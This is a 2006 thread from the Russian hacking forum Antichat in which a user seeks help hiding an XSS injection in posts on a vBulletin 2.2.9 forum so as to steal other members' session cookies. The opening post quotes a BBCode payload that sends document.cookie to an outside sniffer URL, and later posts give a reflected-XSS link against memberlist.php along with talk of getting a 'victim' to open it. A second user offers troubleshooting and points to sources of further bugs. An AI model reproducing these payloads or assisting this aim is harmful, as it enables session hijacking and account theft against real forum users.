ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как можно зашифровать инъекцию на форум так чтобы ее видно не было?
  #1  
Старый 16.01.2006, 17:48
Аватар для ПсиХ
ПсиХ
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195

Репутация: 2
Отправить сообщение для ПсиХ с помощью ICQ
По умолчанию Как можно зашифровать инъекцию на форум так чтобы ее видно не было?

Есть форум vBulletin 2.2.9
Судя по всему админы не поленились и закрыли (казалось бы все возможные дыры).

Пробовал множество инъекций в сообщениях, но они все видны или видны на половину

Пример:

Вставлял:

Код HTML:
[url]http://www.[url=http://wj.com/style=display:none,background:url(javascript:docum  ent.images[1].src="http://antichat.ru/cgi-bin/s.jp  g?"+document.cookie,) ]wj[/url][/url]
Форум выводил:

Код HTML:
[url]http://www..src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj[/url]
как раз то что должно быть скрыто он и выводит!

Хотелось бы побольше узнать про инъекции, как и что надо менять чтобы ее видно не было.

Заранее спасибо.
 
Ответить с цитированием

  #2  
Старый 16.01.2006, 19:49
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

Если он выводит тебе сообщение, т.е. тот код что ты ввел, то значит он (код) не сработал => скрытие тебе не поможет, результатом работы кода (обычно) является алерт, или спи**ивание куков, и это никак не отображается... т.е. ты в сам код внедряешь свой код... так что те коды у тебя не работает.
 
Ответить с цитированием

  #3  
Старый 16.01.2006, 19:52
Аватар для ПсиХ
ПсиХ
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195

Репутация: 2
Отправить сообщение для ПсиХ с помощью ICQ
По умолчанию

Цитата:
Сообщение от WizART  
Если он выводит тебе сообщение, т.е. тот код что ты ввел, то значит он (код) не сработал => скрытие тебе не поможет, результатом работы кода (обычно) является алерт, или спи**ивание куков, и это никак не отображается... т.е. ты в сам код внедряешь свой код... так что те коды у тебя не работает.

Хорошо, а как это обойти ?
 
Ответить с цитированием

  #4  
Старый 16.01.2006, 20:02
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

Это нельзя "обойти", если код не работает - значит уже пропатчили, ищи другой код или уязвимости в этой версии форума. Поищи баги на СекЛабе(http://securitylab.ru)
 
Ответить с цитированием

  #5  
Старый 16.01.2006, 20:31
Аватар для ПсиХ
ПсиХ
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195

Репутация: 2
Отправить сообщение для ПсиХ с помощью ICQ
По умолчанию

Цитата:
Сообщение от WizART  
Это нельзя "обойти", если код не работает - значит уже пропатчили, ищи другой код или уязвимости в этой версии форума. Поищи баги на СекЛабе(http://securitylab.ru)
на секлабе нашел прочку,

вот:
Код:
memberlist.php?ХХХs= ХХХ 23c37cf1af5d2ad05f49361b0407 ХХ ad9e&what=">"<Script>javascript:alert(document.cookie)</Script>
помог мне добыть мои же кукис, когда я был на форуме и ввел это в броузер!

а как достать нужные кукис пока не знаю (есть предложения ? )

Последний раз редактировалось ПсиХ; 16.01.2006 в 20:35..
 
Ответить с цитированием

  #6  
Старый 16.01.2006, 20:49
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

Прально, чтобы добыть чужие кукис нужно чтобы другой чел открыл тему/пост с кодом, который пи*дит куки...
 
Ответить с цитированием

  #7  
Старый 16.01.2006, 20:57
Аватар для ПсиХ
ПсиХ
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195

Репутация: 2
Отправить сообщение для ПсиХ с помощью ICQ
По умолчанию

Цитата:
Сообщение от WizART  
Прально, чтобы добыть чужие кукис нужно чтобы другой чел открыл тему/пост с кодом, который пи*дит куки...

Дык чтобы использовать и получать чужие кукис это

Код:
http://www.vbulletin.com/forum/memberlist.php? Х s Х = Х 23c37cf1af5d2ad05f49361b0407 ХХХ ad9e &what=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>
нужно как нибудь преобразовать, ведь эта фактически ссылка а не инъекция или еще что! и работает она на добавлении кода с получением кукисов
 
Ответить с цитированием

  #8  
Старый 16.01.2006, 21:01
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

Кукисы берутся из клиента-броузера пользователя а не сервера, насколько я знаю.
 
Ответить с цитированием

  #9  
Старый 16.01.2006, 21:09
Аватар для ПсиХ
ПсиХ
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195

Репутация: 2
Отправить сообщение для ПсиХ с помощью ICQ
По умолчанию

Цитата:
Сообщение от WizART  
Кукисы берутся из клиента-броузера пользователя а не сервера, насколько я знаю.

правильно, но эту ссылку должна как я понимаю открывать Жертва + ссылку надо модернизировать чтоб на снифер снимать кукисы
 
Ответить с цитированием

  #10  
Старый 18.01.2006, 23:13
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

Ищи другой способ.
//модерам
ЧТО за тупая привычка стирать нужные посты?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
химия своими руками silveran Болталка 43 11.01.2006 22:05
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41
SQL инъекция в сервере MySQL k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ